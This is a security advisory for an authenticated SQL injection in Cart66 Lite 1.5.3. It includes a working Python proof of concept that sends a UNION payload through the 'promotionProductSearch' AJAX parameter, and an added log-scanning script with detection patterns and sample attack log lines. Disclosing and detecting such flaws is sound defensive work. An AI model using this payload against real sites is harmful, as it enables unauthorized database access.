Cart66 Lite 1.5.3, SQL Injection
The query string argument (QSA) named 'q' of the 'promotionProductSearch' AJAX call is not sanitized, which allows MySQL injection using a UNION. The user must be logged in for this to apply. The output is JSON encoded, but it is a direct representation of the data returned by the MySQL query.
CVSS Score
4
CVSS Vector
(AV:N/AC:L/Au:S/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 1.5.4.
Proof of Concept
import requests

s = requests.session()
blog_url = 'http://localhost'

# Log in to WordPress; the vulnerable AJAX action requires an authenticated session
url = '%s/wp-login.php' % blog_url
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Trigger our MySQL injection through the unsanitized 'q' parameter
url = '%s/wp-admin/admin-ajax.php' % blog_url
params = {
    "action": "promotionProductSearch",
    "q": "' UNION ALL SELECT CAST(DATABASE() AS CHAR),NULL#"
}
r = s.get(url, params=params)
print(r.text)
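A request like the one above leaves a recognizable trace in the web server access log: a GET to admin-ajax.php with action=promotionProductSearch and SQL syntax in the 'q' parameter. The following detection script is an added example written for this advisory, not code from the advisory or from the Cart66 plugin. It parses constructed combined-format log lines (the IP addresses, timestamps and user agents are made up) and flags requests that match that shape, so a site owner can check whether the issue was exploited before updating to 1.5.4.

```python
# Added example (not from the advisory): flag admin-ajax.php requests that hit the
# promotionProductSearch action with SQL syntax in the 'q' parameter, as a
# retrospective check over web server access logs.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Dec/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=promotionProductSearch&q=shirt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Dec/2014:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=promotionProductSearch&q=%27%20UNION%20ALL%20SELECT%20CAST%28DATABASE%28%29%20AS%20CHAR%29%2CNULL%23 HTTP/1.1" 200 87 "-" "python-requests/2.5.0"
10.0.0.9 - - [29/Dec/2014:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Dec/2014:10:00:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# SQL syntax that does not belong in a product-name search term:
# UNION ... SELECT, a quote followed by OR/AND, or a trailing MySQL comment.
SQLI_RE = re.compile(r"(?i)\bunion\b.*\bselect\b|['\"]\s*(?:or|and)\b|--|/\*|#\s*$")


def parse_line(line):
    """Return a dict with the decoded request fields, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    # parse_qs percent-decodes values, so %27 becomes the quote the attacker sent.
    qs = parse_qs(parts.query, keep_blank_values=True)
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "action": qs.get("action", [None])[0],
        "q": qs.get("q", [None])[0],
        "status": int(m.group("status")),
    }


def is_suspicious(rec):
    """True when the request targets the vulnerable action with SQL syntax in q."""
    return (
        rec is not None
        and rec["path"].endswith("/wp-admin/admin-ajax.php")
        and rec["action"] == "promotionProductSearch"
        and rec["q"] is not None
        and SQLI_RE.search(rec["q"]) is not None
    )


def find_injection_attempts(log_text):
    """Return the parsed records of every suspicious request in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_suspicious(rec):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} q={hit['q']!r}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. Because WordPress only accepts the action from a logged-in user, a hit is worth correlating with the wp-login.php POST from the same client just before it. The SQL pattern is deliberately narrow (UNION/SELECT, quote-then-OR/AND, comment markers) to keep false positives low on ordinary search terms; loosen it if your logs show other variants.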
Timeline
- 2014-12-12: Discovered
- 2014-12-12: Vendor notified
- 2014-12-15: CVE Requested
- 2014-12-16: Vendor responded
- 2014-12-22: 1.5.4 released – issue resolved
- 2014-12-29: Advisory released
- 2015-01-05: CVE Assigned